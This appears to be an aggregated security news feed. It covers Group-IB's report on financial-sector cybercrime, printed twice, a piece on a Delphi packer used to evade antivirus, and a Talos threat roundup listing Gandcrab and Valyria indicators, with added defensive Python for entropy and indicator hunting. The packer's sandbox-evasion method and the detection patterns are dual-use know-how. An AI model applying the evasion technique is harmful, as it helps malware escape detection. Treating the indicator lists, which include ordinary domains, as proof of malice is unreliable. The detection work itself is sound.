There has been a significant rise in the number of crimes committed using web phishing and fake websites of banks, payment systems, telecoms operators, online stores and famous brands. Using web phishing, criminals have managed to steal $3.7 million (251 million rubles), 6% more than in the previous period. On average, approximately $15 is stolen in each phishing attack. According to Group-IB estimates, the number of groups that create phishing websites imitating Russian brands has increased from 15 to 26. As for global trends, as expected, the greatest number of financial phishing websites are registered in the USA, which accounts for 80% of all financial phishing sites. France is in second place, followed by Germany.

Group-IB’s CEO, Ilya Sachkov, notes that to defeat cyber crime, we need to synchronize the law at state level, hit the economic base and funding channels of criminals, and introduce a moratorium on the development and sale of digital weapons that may end up in criminal hands.

“Cyber security must be a priority paradigm for people, business, and the state. It is thought that countering cyber threats is a typical competition of armor and equipment. This is why the protection paradigm itself has now changed: the main idea is to be a few steps ahead of the cyber criminals and stop crimes from happening in the first place.”

About the author: Group-IB

Group-IB is one of the world’s leading providers of solutions aimed at the detection and prevention of cyber attacks, fraud exposure and protection of intellectual property on the Internet. Its GIB Threat Intelligence cyber threat data collection system has been named one of the best in class by Gartner, Forrester, and IDC.

Group-IB’s technological leadership is built on the company’s fifteen years of hands-on experience in cybercrime investigations all over the world and 55,000 hours of cyber security incident response accumulated in the largest forensic laboratory in Eastern Europe and a round-the-clock centre providing rapid response to cyber incidents, CERT-GIB.

Group-IB is a partner of INTERPOL, Europol, and a cybersecurity solutions provider, recommended by SWIFT and OSCE.

Pierluigi Paganini

(Security Affairs – financial sector, cybercrime)

The post Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks appeared first on Security Affairs.

Security Affairs: Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks

Security firm Group-IB has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector

Group-IB, an international company that specializes in preventing cyber attacks, has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector. As stated in Group-IB’s annual report “Hi-Tech Crime Trends 2018” presented at the CyberCrimeCon18 conference, every month, 1-2 banks lose money as a result of cyber attacks, and the damage caused by one successful theft is, on average, $2 million.

“Financial motivation still prevails among APT-groups, however stolen money — is not the most dangerous thing that could happen to a financial organization”, — says Ilya Sachkov, Group-IB CEO and founder.  “Since in many countries banks are considered critical infrastructure, they are the targets for state-sponsored hacker groups, specialized in sabotage. One successful attack is capable of destroying one   financial organization and even the collapse of a state financial system. Considering this, banks need to rethink their approach to protection against cyber threats. Defense is an outdated strategy. It’s time to stop being victims and become hunters.”

financial sector Russia attacks

In the new report, Group-IB experts described in detail the cyber threats to the financial sector—active APT groups, tactics of the attackers, infection vectors, and new hacker tools.

Targeted attacks on banks:

Active groups and withdrawal methods

Group-IB identifies 4 criminal APT groups that pose a real threat to the financial sector: not only are they able to penetrate a bank’s network and access isolated financial systems, but they can also successfully withdraw money via SWIFT, AWS CBR, card processing and ATMs. These groups are Cobalt, MoneyTaker, Silence, which are led by Russian-speaking hackers, and the North Korean group Lazarus.

Only two criminal groups pose a threat to the SWIFT interbank transfer system: Lazarus and Cobalt, the latter of which, at the end of 2017, conducted the first successful attack in the history of Russia’s financial sector on a bank using SWIFT. According to Group-IB estimates, the number of targeted attacks on banks to conduct thefts via SWIFT in the reporting period increased threefold. In the previous period, three such attacks were recorded: in Hong Kong, Ukraine, and Turkey. In this period, however, there have already been 9 successful attacks in Nepal, Taiwan, Russia, Mexico, India, Bulgaria, and Chile. The good news is that with SWIFT most of the unauthorized transfers can be stopped in time and returned to the banks affected.

Attacks on card processing remain one of the main methods of theft and they are actively used by hackers from Cobalt, MoneyTaker, and Silence. In February 2018, members of Silence conducted a successful attack on a bank and stole money via card processing: they managed to withdraw $522,000 (35 million rubles) from cards via the ATMs of a partner bank. Focusing attacks on ATMs and card processing led to a reduction in the average amount of damage from one attack. However, they allow attackers to conduct these attacks more securely for “drops” who cash out the stolen money. The attackers are in one country, their victim (the bank) in another, and the cashing out is done in a third country.

Withdrawing money through the AWS CBR (Automated Work Station Client of the Russian Central Bank) is actively used by MoneyTaker—in November 2017, they managed to withdraw $104,000 (7 million rubles), but in summer 2018, they successfully stole $865,000 (58 million rubles) from PIR Bank. MoneyTaker has already conducted 16 attacks in the US, 5 on banks in Russia, and 1 in the UK. In the US, the average amount of damage from one attack is $500,000. In Russia, the average amount of funds withdrawn is $1.1 million (72 million rubles). In December 2017, Group-IB published the first report on this group: “MoneyTaker: 1.5 Years of Silent Operations”.

In the designated period, only Cobalt conducted attacks on payment gateways. In 2017, they used this method to steal money from two companies, however, no attempts were made in 2018. They were helped in one of their attacks by members of the group Anunak, which had not conducted at attack of this kind since 2014. Despite the arrest of the gang’s leader in Spain in spring 2018, Cobalt continues to be one of the most active and aggressive groups, steadily attacking financial organizations in Russia and abroad 2-3 times a month.

Attacks on bank customers:

The decline of Android Trojans and the triumph of phishing

In Russia, according to Group-IB experts, there are no longer any groups left that would conduct thefts from individuals using banking Trojans for PCs. This trend aimed at reducing threats from banking Trojans for PCs has been continuing in Russia since 2012.

At present, only three criminal groups—Buhtrap2, RTM, and Toplel—steal money from the accounts of legal entities in Russia. Group-IB experts noted a change in the attackers’ tactics in the second half of 2017: the vector for the distribution of Trojans was no longer the traditional malicious campaigns or hacked popular sites, but the creation of new tailored resources for accountants and companies executives who use remote banking systems (RBSs), payment systems, or cryptocurrency wallets in their work. On the fake resources, the criminals placed code that was designed to download the Buhtrap and RTM Trojans.

Unlike in Russia, on the global stage, the cyber threat landscape has undergone far greater changes. Six new banking Trojans for PCs have emerged: IcedID, BackSwap, DanaBot, MnuBot, Osiris and Xbot. Among the new Trojans, we would like to highlight BackSwap, which initially only attacked banks in Poland, but then moved on to banks in Spain. BackSwap is interesting because it simultaneously implemented several new techniques of introducing code to automatically replace payment details. The greatest threat for bank customers still comes from criminal groups that use the Dridex, Trickbot, and Gozi Trojans.

Over the last year, Group-IB experts have noted a decline in Russia of the epidemic of infecting smartphones with Android Trojans, after several years of rapid growth. The number of daily thefts committed using Android Trojans in Russia decreased almost threefold, and the average amount of theft decreased from $164 to $104. New Android Trojans—Easy, Exobot 2.0, CryEye, Cannabis, fmif, AndyBot, Loki v2, Nero banker, Sagawa and others—that are put up for sale or hire on hacker forums are primarily intended for use outside of Russia. An exception to this is the malware Banks in Your Hand. The Trojan was disguised as a financial app intended to be used as an “aggregator” of the mobile banking systems of Russia’s leading banks. Every day, the Trojan stole between $1,500 and $7,500 from users, however in March 2018, with Group-IB’s assistance, the criminals were detained by the police. Another cause of the reduction in the damage among customers can be explained by banks and payment systems introducing technologies for early fraud detection that use behavioral analysis algorithms, allowing to detect attacks, that combine social engineering scams phishing, botnets, illegal money withdrawal networks and fraud across multiple channels and other types of banking fraud on all customer devices and platforms

There has been a significant rise in the number of crimes committed using web phishing and fake websites of banks, payment systems, telecoms operators, online stores and famous brands. Using web phishing, criminals have managed to steal $3.7 million (251 million rubles), which is 6% more than in the previous period. On average, approximately $15 are stolen in each phishing attack. According to Group-IB estimates, the number of groups that create phishing websites imitating Russian brands has increased from 15 to 26. As for global trends, as expected, the greatest amount of websites for financial phishing are registered in the USA. They account for 80% of all financial phishing sites. France is in second place, followed by Germany.

Group-IB’s CEO, Ilya Sachkov, notes that to defeat cyber crime, we need to synchronize the law at state level, hit the economic base and funding channels of criminals, and introduce a moratorium on the development and sale of digital weapons that may end up in criminal hands.

“Cyber security must be a priority paradigm for people, business, and the state. It is thought that countering cyber threats is a typical competition of armor and equipment. This is why the protection paradigm itself has now changed: the main idea is to be a few steps ahead of the cyber criminals and stop crimes from happening in the first place.”

About the author Group-IB

Group-IB is one of the world’s leading providers of solutions aimed at the detection and prevention of cyber attacks, fraud exposure and protection of intellectual property on the Internet. The GIB Threat Intelligence cyber threat data collection system has been named one of the best in class by Gartner, Forrester, and IDC.

Group-IB’s technological leadership is built on the company’s fifteen years of hands-on experience in cybercrime investigations all over the world and 55,000 hours of cyber security incident response accumulated in the largest forensic laboratory in Eastern Europe and in CERT-GIB, a round-the-clock centre providing rapid response to cyber incidents.

Group-IB is a partner of INTERPOL, Europol, and a cybersecurity solutions provider, recommended by SWIFT and OSCE.

Pierluigi Paganini

(Security Affairs – financial sector, cybercrime)

The post Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks appeared first on Security Affairs.


Cryptomining dethrones ransomware as top threat in 2018

Based on trends in the first half of 2018, Webroot found that cybercriminals are shifting to increasingly sophisticated and targeted means of attack while also expanding their money making endeavors, as shown by the uptick in cryptojacking and cryptomining.

The current threat landscape

There has been a massive shift from ransomware to cryptomining. Malware in general, including ransomware and cryptomining, accounted for 52 percent of threats in the first half of 2018. Nonconsensual cryptomining (known … More

The post Cryptomining dethrones ransomware as top threat in 2018 appeared first on Help Net Security.

MikroTik router vulnerability lets hackers bypass firewall to load malware undetected

By Waqas

A Tenable Research security researcher has released “By the Way,” a new proof-of-concept (PoC) remote code execution (RCE) attack, after identifying a new method of exploiting an already known vulnerability in MikroTik routers. The vulnerability, tracked as CVE-2018-14847, is a directory traversal flaw that was patched the same day it was found, in April 2018. […]

This is a post from HackRead.com Read the original post: MikroTik router vulnerability lets hackers bypass firewall to load malware undetected

Threat Actors Use Delphi Packer to Shield Binaries From Malware Classification

Threat actors are increasingly using a Delphi packer to shield their binaries from malware classification by antivirus software and other security solutions.

FireEye analyzed several samples carrying the “BobSoft Mini Delphi” signature and determined that the samples were consistent with Delphi code constructs. These findings revealed that the malware binaries had been packed using a Delphi packer.

The enterprise security firm observed the packed samples being dropped in various spam campaigns. One operation used an attached document with malicious macros to download the malware. Another leveraged a document that exploited an equation editor vulnerability to deploy its packed payload.

In its analysis, FireEye came across at least eight malware families using the Delphi packer for their campaigns. Lokibot was by far the most prominent, followed by the Pony downloader and NanoCore. Researchers also spotted a cryptomining threat called CoinMiner using the packer.

How Do Malicious Actors Avoid Malware Classification?

The Delphi packer is just the latest cybercriminal effort to prevent malware from being detected or reverse engineered. Attackers do this by wrapping their payloads in code that is not itself malicious: a packer compresses (and often encrypts) the original executable and prepends a small loader stub that decompresses it in memory at run time, so a static scanner sees only the stub rather than the real payload. The Delphi packer adds to this by monitoring open windows and mouse cursor movement for signs of a sandbox environment; if it finds them, it puts itself into an infinite sleep so that automated analysis never reaches the payload.

Packers aren’t the only services that bad actors use to hide their malware. Malwarebytes noted that cybercriminals also turn to crypters, which use obfuscation or actual encryption to make their payloads undetectable, and protectors, which block reverse engineering attempts.

How to Protect Against Packed Malware

According to FireEye, security professionals can protect their organizations against packed malware by using sandbox environments that model real user behavior (open windows, cursor movement, ordinary interaction), so that the packer’s environment checks pass and the payload is executed and observed. The threat advisory on IBM X-Force Exchange advises users to update their antivirus software and verify the legitimacy of any unsolicited email attachment. Finally, security personnel should analyze threat intelligence to learn about the latest packers that are available in dark web marketplaces.
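Entropy is the usual first triage for a suspected packed binary: compressed or encrypted sections look close to random (near 8 bits per byte), while ordinary compiled code and string data sit well below that. The following is an added example, not code from FireEye or from the article; the section contents are constructed stand-ins (Delphi-style CODE/DATA section names, a pseudo-random blob standing in for the packed payload), and the 7.0 bits/byte threshold is a common rule of thumb, not a value the page states.

```python
"""Entropy heuristic for spotting packed PE sections (added example)."""
import math
import random
from collections import Counter
from typing import Dict, List

# Rule-of-thumb threshold (assumption): plain code/data rarely exceeds ~6.5
# bits per byte, while compressed or encrypted payloads sit above 7.0.
PACKED_ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def find_packed_sections(sections: Dict[str, bytes],
                         threshold: float = PACKED_ENTROPY_THRESHOLD) -> List[str]:
    """Return the names of sections whose entropy exceeds the threshold."""
    return [name for name, blob in sections.items()
            if shannon_entropy(blob) > threshold]


def _fake_code(n: int) -> bytes:
    # Constructed stand-in for unpacked x86 code: a handful of common
    # prologue/epilogue opcodes repeated, which keeps entropy low.
    pattern = (b"\x55\x8b\xec\x83\xec\x10\x53\x56\x57\x8b\x45\x08"
               b"\xe8\x00\x00\x00\x00\x5f\x5e\x5b\xc9\xc3")
    return (pattern * (n // len(pattern) + 1))[:n]


def _fake_packed(n: int) -> bytes:
    # Constructed stand-in for a compressed/encrypted payload: deterministic
    # pseudo-random bytes, which is what a packed payload looks like on disk.
    rng = random.Random(0x5EED)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed sample binary. CODE and DATA are the section names the Delphi
# linker emits; here the packed payload has been parked in .rsrc.
SAMPLE_SECTIONS: Dict[str, bytes] = {
    "CODE": _fake_code(8192),
    "DATA": b"TForm1\x00TButton\x00TEdit\x00OnClick\x00" * 300,
    ".rsrc": _fake_packed(16384),
}


if __name__ == "__main__":
    for name, blob in SAMPLE_SECTIONS.items():
        print(f"{name:6s} {len(blob):6d} bytes  {shannon_entropy(blob):.2f} bits/byte")
    print("suspected packed sections:", find_packed_sections(SAMPLE_SECTIONS))
```

On a real file, feed `find_packed_sections` the raw bytes of each section from a PE parser (for example the `get_data()` method of a `pefile` section object). A high-entropy `.rsrc` or a single oversized writable section alongside a tiny code section is the profile a packer stub leaves behind; it is a triage signal, not proof, since legitimately compressed resources or embedded certificates also score high.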

Sources: FireEye, Malwarebytes

The post Threat Actors Use Delphi Packer to Shield Binaries From Malware Classification appeared first on Security Intelligence.

Most hosting providers take too long to remove malware distribution sites

How long does it take web hosting providers to remove malware distribution sites parked on their network? Roman Hussy, the Swiss security activist behind abuse.ch, says that, on average, it takes them 3 days, 2 hours, and 33 minutes. Some are much quicker than that and some are much slower – the record is held by an Australian ISP that took nearly 20 days – as there are many things that interfere with automated and … More

The post Most hosting providers take too long to remove malware distribution sites appeared first on Help Net Security.

Keeping your cloud malware-free: What you need to know

This year we’ve seen massive malware attacks spanning from nation state campaigns originating in North Korea and Russia to popular restaurants and everything in between. Each new incident serves as a grim reminder to business leaders that hackers will not relent. Yet with cloud adoption growing rapidly in the enterprise, the odds of a malware infection spreading and leading to a potential breach are increasing. According to a study conducted by the Ponemon Institute, almost … More

The post Keeping your cloud malware-free: What you need to know appeared first on Help Net Security.

Hackers illegally selling stolen Fortnite accounts & botnets on Instagram

By Waqas

It is not happening on the dark web but on Instagram. Instagram has become much more than a platform to share your traveling, culinary, or fitness-related experiences; it is now a thriving portal for selling stolen accounts. Reportedly, hackers are using Instagram to sell access to botnets as well as stolen user accounts from Spotify, Fortnite and other services. […]

This is a post from HackRead.com Read the original post: Hackers illegally selling stolen Fortnite accounts & botnets on Instagram

Threat Roundup Sept 28 – Oct 5

Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Sept. 28 and Oct. 5. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.
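The caveat above (a single IOC does not indicate maliciousness) is easiest to see with the indicators themselves. The following is an added example, not Talos code or tooling: it refangs a few indicators copied from the Gandcrab and Valyria entries of this roundup (the domains, one mutex, the ransom-note and encrypted-file names, and the WinDefend service values), runs them over constructed key=value telemetry lines, and only escalates a host when at least two independent indicator types agree. The log format, the host names and the `[A-Z]{4,10}-DECRYPT.txt` generalisation of the note name are assumptions.

```python
"""IOC hunting over host telemetry with corroboration (added example)."""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set

# Indicators copied from this roundup, kept in the defanged form in which
# they are published so nothing here is accidentally clickable.
DEFANGED_DOMAINS = {
    "big-game-fishing-croatia[.]hr",
    "yourmine[.]ru",
    "www[.]reg[.]ru",            # a registrar: legitimate traffic hits this too
    "cdnjs[.]cloudflare[.]com",  # likewise, a public CDN
    "myexternalip[.]com",        # Valyria; also used by ordinary software
}
MUTEXES = {"Global\\XlAKFoxSKGOfSGOoSFOOFNOLPE"}
# Gandcrab renames encrypted files with .GDCB/.CRAB/.KRAB and drops a
# <letters>-DECRYPT.txt note (SGMNP-DECRYPT.txt in this roundup); the
# letter-count range in the regex is an assumption.
RANSOM_NOTE_RE = re.compile(r"[\\/][A-Z]{4,10}-DECRYPT\.txt$")
ENCRYPTED_EXT_RE = re.compile(r"\.(GDCB|CRAB|KRAB)$", re.IGNORECASE)
# Valyria writes the Start and DeleteFlag values of the WinDefend service.
DEFENDER_SERVICE_RE = re.compile(r"\\SERVICES\\WINDEFEND$", re.IGNORECASE)
DEFENDER_VALUES = {"Start", "DeleteFlag"}


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into its live form for matching."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


DOMAINS = {refang(d).lower() for d in DEFANGED_DOMAINS}


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed key=value telemetry line (not a real product format)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def match_event(ev: Dict[str, str]) -> Optional[str]:
    """Return the indicator category an event matches, or None."""
    kind = ev.get("type")
    if kind == "dns" and ev.get("query", "").lower() in DOMAINS:
        return "domain"
    if kind == "mutex" and ev.get("name") in MUTEXES:
        return "mutex"
    if kind == "file":
        path = ev.get("path", "")
        if RANSOM_NOTE_RE.search(path):
            return "ransom_note"
        if ENCRYPTED_EXT_RE.search(path):
            return "encrypted_file"
    if (kind == "reg" and DEFENDER_SERVICE_RE.search(ev.get("key", ""))
            and ev.get("value") in DEFENDER_VALUES):
        return "defender_tamper"
    return None


def collect_hits(lines: Iterable[str]) -> Dict[str, Set[str]]:
    """Map each host to the set of indicator categories observed on it."""
    hits: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        category = match_event(ev)
        if category and "host" in ev:
            hits[ev["host"]].add(category)
    return dict(hits)


def escalate(hits: Dict[str, Set[str]], min_categories: int = 2) -> Dict[str, List[str]]:
    """Keep only hosts where at least min_categories independent indicator types agree."""
    return {h: sorted(c) for h, c in hits.items() if len(c) >= min_categories}


# Constructed telemetry: ws01 shows the full Gandcrab picture, ws04 the
# Valyria pattern, while ws02 and ws03 each only resolved a domain that
# legitimate software resolves too.
SAMPLE_EVENTS = [
    "host=ws01 type=dns query=www.reg.ru",
    "host=ws01 type=mutex name=Global\\XlAKFoxSKGOfSGOoSFOOFNOLPE",
    "host=ws01 type=file path=C:\\Users\\bob\\Videos\\SGMNP-DECRYPT.txt",
    "host=ws01 type=file path=C:\\Users\\bob\\Documents\\budget.xlsx.KRAB",
    "host=ws02 type=dns query=www.reg.ru",
    "host=ws03 type=dns query=cdnjs.cloudflare.com",
    "host=ws04 type=reg key=HKLM\\SYSTEM\\ControlSet001\\Services\\WinDefend value=Start",
    "host=ws04 type=dns query=myexternalip.com",
]

if __name__ == "__main__":
    all_hits = collect_hits(SAMPLE_EVENTS)
    for host, cats in sorted(all_hits.items()):
        print(f"{host}: {sorted(cats)}")
    print("escalate:", escalate(all_hits))
```

Raising `min_categories` trades recall for precision; the point is that ws02 and ws03, which only touched a registrar and a CDN from the contacted-domains list, are reported but not escalated, whereas a host showing a mutex, a ransom note and renamed files together is. Network-only indicators from a sandbox run are the noisiest of the lists below, because the sample resolves whatever the compromised sites it calls happen to load.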

The most prevalent threats highlighted in this roundup are:

  • Win.Malware.Gandcrab-6706045-0
    Malware
    Gandcrab is ransomware that encrypts documents, photos, databases and other important files, giving them the file extension ".GDCB", ".CRAB" or ".KRAB". Gandcrab is spread through both traditional spam campaigns and multiple exploit kits, including Rig and Grandsoft.
     
  • Xls.Downloader.Valyria-6704496-0
    Downloader
    These variants of Valyria are malicious Excel files that contain embedded VBA macros used to distribute other malware.
     
  • Win.Dropper.Fqdq-6705253-0
    Dropper
    This dropper attempts to access the Firefox Password Manager local database, uses a temporary batch file to perform additional malicious activities and uploads files to remote servers. Additionally, it might inject code, read INI files or use Visual Basic scripts.
     
  • Win.Malware.Genkryptik-6704925-0
    Malware
    Win.Malware.Genkryptik is oftentimes a generic detection name for a Windows trojan. Some of the malicious activities that could be performed by these samples, without the user's knowledge, include: collecting system information, downloading and uploading files and dropping additional samples.
     
  • Win.Malware.Zusy-6704537-0
    Malware
    Zusy is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". The malware attempts to trick the user into entering their login information whenever they visit a financial services website.
     
  • Win.Malware.Razy-6703914-0
    Malware
    Razy is oftentimes a generic detection name for a Windows trojan. These samples collect sensitive information from the infected host, encrypt the data and send it to a command and control (C2) server. The information collected might include screenshots. The samples gain persistence by setting or creating an auto-execute value in the registry.
     
  • Doc.Malware.Emooodldr-6699885-0
    Malware
    These malicious Word documents contain embedded VBA macros that spawn new processes, drop files and remove Office resiliency keys.
     

Threats

Win.Malware.Gandcrab-6706045-0


Indicators of Compromise


Registry Keys
  • <HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E
    • Value Name: LanguageList
  • <HKCU>\CONTROL PANEL\DESKTOP
    • Value Name: Wallpaper
Mutexes
  • Global\8B5BAAB9E36E4507C5F5.lock
  • Global\XlAKFoxSKGOfSGOoSFOOFNOLPE
  • Groove:PathMutex:tzanqCjN6dCs1QGzbKslin0UfIk=
IP Addresses contacted by malware. Does not indicate maliciousness.
  • 50[.]63[.]202[.]89
  • 93[.]125[.]99[.]121
  • 137[.]74[.]238[.]33
  • 94[.]231[.]109[.]239
  • 185[.]135[.]88[.]105
  • 146[.]66[.]72[.]87
  • 87[.]236[.]16[.]31
  • 217[.]160[.]0[.]234
  • 69[.]73[.]180[.]151
  • 104[.]31[.]77[.]95
  • 171[.]244[.]34[.]167
  • 217[.]174[.]149[.]130
  • 70[.]40[.]197[.]96
  • 223[.]26[.]62[.]72
  • 80[.]77[.]123[.]23
  • 178[.]238[.]37[.]162
  • 51[.]68[.]50[.]168
  • 104[.]28[.]30[.]160
  • 67[.]227[.]236[.]96
  • 66[.]96[.]147[.]67
  • 179[.]188[.]11[.]34
  • 89[.]252[.]187[.]72
  • 194[.]58[.]56[.]95
  • 104[.]28[.]28[.]142
  • 104[.]27[.]163[.]241
  • 213[.]186[.]33[.]186
  • 107[.]178[.]113[.]162
  • 87[.]236[.]16[.]29
  • 188[.]165[.]53[.]185
  • 173[.]247[.]242[.]133
  • 77[.]104[.]144[.]25
  • 191[.]252[.]51[.]37
  • 202[.]43[.]45[.]181
  • 192[.]163[.]234[.]40
  • 217[.]160[.]0[.]27
  • 209[.]182[.]208[.]245
  • 94[.]73[.]148[.]18
  • 45[.]33[.]91[.]79
  • 87[.]236[.]19[.]135
  • 52[.]29[.]192[.]136
  • 178[.]33[.]233[.]202
  • 92[.]53[.]96[.]201
  • 186[.]202[.]153[.]158
  • 104[.]24[.]104[.]13
  • 213[.]186[.]33[.]3
  • 188[.]64[.]184[.]90
  • 95[.]213[.]173[.]173
  • 103[.]107[.]17[.]102
  • 103[.]27[.]238[.]31
  • 50[.]87[.]58[.]165
  • 104[.]27[.]186[.]113
  • 104[.]24[.]102[.]153
  • 77[.]104[.]171[.]238
  • 194[.]154[.]192[.]67
  • 87[.]236[.]16[.]41
Domain Names contacted by malware. Does not indicate maliciousness.
  • www[.]litespeedtech[.]com
  • big-game-fishing-croatia[.]hr
  • www[.]lagouttedelixir[.]com
  • dreamhost[.]com
  • www[.]himmerlandgolf[.]dk
  • hanaglobalholding[.]com
  • top-22[.]ru
  • zaeba[.]co[.]uk
  • ispsystem[.]com
  • unnatimotors[.]in
  • www[.]macartegrise[.]eu
  • blokefeed[.]club
  • bellytobabyphotographyseattle[.]com
  • diadelorgasmo[.]cl
  • www[.]bgfc[.]hr
  • www[.]wash-wear[.]com
  • yourmine[.]ru
  • www[.]reg[.]ru
  • www[.]poketeg[.]com
  • boatshowradio[.]com
  • www[.]perfectfunnelblueprint[.]com
  • perovaphoto[.]ru
  • www[.]cakav[.]hu
  • www[.]billerimpex[.]com
  • evotech[.]lu
  • www[.]ismcrossconnect[.]com
  • help[.]dreamhost[.]com
  • www[.]fabbfoundation[.]gm
  • alem[.]be
  • cevent[.]net
  • mauricionacif[.]com
  • smbardoli[.]org
  • www[.]aco[.]dk
  • cyclevegas[.]com
  • lucides[.]co[.]uk
  • krasnaypolyana123[.]ru
  • hoteltravel2018[.]com
  • oceanlinen[.]com
  • 6chen[.]cn
  • koloritplus[.]ru
  • asl-company[.]ru
  • www[.]krishnagrp[.]com
  • test[.]theveeview[.]com
  • cdnjs[.]cloudflare[.]com
  • picusglancus[.]pl
  • bloghalm[.]eu
  • api[.]w[.]org
  • nesten[.]dk
  • simetribilisim[.]com
  • pp-panda74[.]ru
  • wpakademi[.]com
  • dna-cp[.]com
  • h5s[.]vn
  • bethel[.]com[.]ve
  • vjccons[.]com[.]vn
  • www[.]rment[.]in
  • marketisleri[.]com
  • www[.]byggekvalitet[.]dk
  • royal[.]by
  • gmpg[.]org
  • sherouk[.]com
  • tommarmores[.]com[.]br
  • graftedinn[.]us
  • www[.]mimid[.]cz
  • maxcdn[.]bootstrapcdn[.]com
  • panel[.]dreamhost[.]com
  • relectrica[.]com[.]mx
  • acbt[.]fr
  • damt7w3yoa0t2[.]cloudfront[.]net
  • topstockexpert[.]su
  • goodapd[.]website
  • www[.]n2plus[.]co[.]th
  • aurumwedding[.]ru
  • devdev[.]com[.]br
  • www[.]toflyaviacao[.]com[.]br
  • mimid[.]cz
  • nhs-foi[.]com
  • www[.]iyfipgun[.]com
  • wash-wear[.]com
Files and or directories created
  • %AppData%\Microsoft\Internet Explorer\UserData\MA3SBLRS\spid[1].xml
  • %UserProfile%\Videos\98b689db98b68e303c.lock
  • %UserProfile%\Start Menu\98b689db98b68e303c.lock
  • %UserProfile%\Start Menu\SGMNP-DECRYPT.txt
  • %UserProfile%\Videos\Sample Videos\98b689db98b68e303c.lock
  • %UserProfile%\Videos\Sample Videos\SGMNP-DECRYPT.txt
  • \??\E:\$RECYCLE.BIN\S-1-5-21-2580483871-590521980-3826313501-500\98b689db98b68e303c.lock
  • \??\E:\$RECYCLE.BIN\S-1-5-21-2580483871-590521980-3826313501-500\SGMNP-DECRYPT.txt
  • \??\E:\$RECYCLE.BIN\SGMNP-DECRYPT.txt
  • \??\E:\98b689db98b68e303c.lock
  • \??\E:\SGMNP-DECRYPT.txt
  • \MSOCache\SGMNP-DECRYPT.txt
  • \PerfLogs\Admin\SGMNP-DECRYPT.txt
  • \PerfLogs\SGMNP-DECRYPT.txt
  • \Recovery\926583e2-ef64-11e4-beed-d6738078ad98\SGMNP-DECRYPT.txt
  • \Recovery\SGMNP-DECRYPT.txt
  • \SGMNP-DECRYPT.txt
  • \TEMP\SGMNP-DECRYPT.txt
  • %UserProfile%\Videos\SGMNP-DECRYPT.txt
File Hashes
  • 211484d0deda5cb97b16b27538b7d1d2c26af6ae3aac3c888085a0e8ddf2d8bd
  • 46b702851cb5c1df0a97d1ae9e3202316d36ef2195395a9bcc3699dd1d247733
  • 4e2ba4638d01c1473f0959fae6d31636456cde0ab995fa5f3fad1efc2cb7bf0e
  • 69fd1808c32fe3209f384fba8f79df13bec479e9b081f7edcf8720f6257f7dfe
  • 8b5c1735800d8ad69b535a863f4ae1941604b3e57261961e230a26b16b4b98ec
  • 9ec54c9d6ec39c34c8e011fcb10fb2ae5334d1d0632e63a61d94b36b9f9c8a9b
  • c394e7fa3604f5ee26419a913dbfeb0988d59bbf8ed25d852ebf62a48cc1688a
  • c4a126172b27777413ee4efcd0ce8656fbef52e81c984993af3fa63d5264cc8e
  • d81aa5dbd9272f9be6e4a0def514a9284220d88f219ac6fd908ab2c942b92cdc
  • d9129786346cfa0aa07a1c82d4bcb79a977c7c8e1a052916a34b6cde4c09c006
  • e41697a99da83a32bf8a56f993123fbfaef378d5e6f61286a272536fe10b6d35
  • e50a28068fcae51a609946fad1637a5dbfbda8add88063ddb117cb8e0cfc4a74
  • e8502aa65a4da371c0e378b245374af7340b809140a5d2e3bc3bfa67a92a2bde
  • eb9347f0fbbb675ecc61beb1f2be8721871e203357b124ad9858037a641709f5
  • f77825b0388a6220521219030ad70bdb6fcd3216a590d092ec4aa22a506a17b6

Coverage: detection table and screenshots (AMP, ThreatGrid, Umbrella) not reproduced in this archive.

Xls.Downloader.Valyria-6704496-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: UNCAsIntranet
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: AutoDetect
  • <HKCU>\SOFTWARE\MICROSOFT\WISP\MULTITOUCH
    • Value Name: MultiTouchEnabled
  • <HKCU>\SOFTWARE\MICROSOFT\WISP\PEN\PERSIST\0\1
    • Value Name: HidCursorName
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
    • Value Name: DeleteFlag
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
    • Value Name: Start
Mutexes
  • Local\10MU_ACB10_S-1-5-5-0-57527
  • Local\10MU_ACBPIDS_S-1-5-5-0-57527
  • Global\316D1C7871E00
  • {773F1B9A-35B9-4E95-83A0-A210F2DE3B37}-Default
IP Addresses contacted by malware. Does not indicate maliciousness.
  • 78[.]47[.]139[.]102
  • 107[.]180[.]25[.]0
  • 103[.]110[.]91[.]118
  • 89[.]163[.]224[.]250
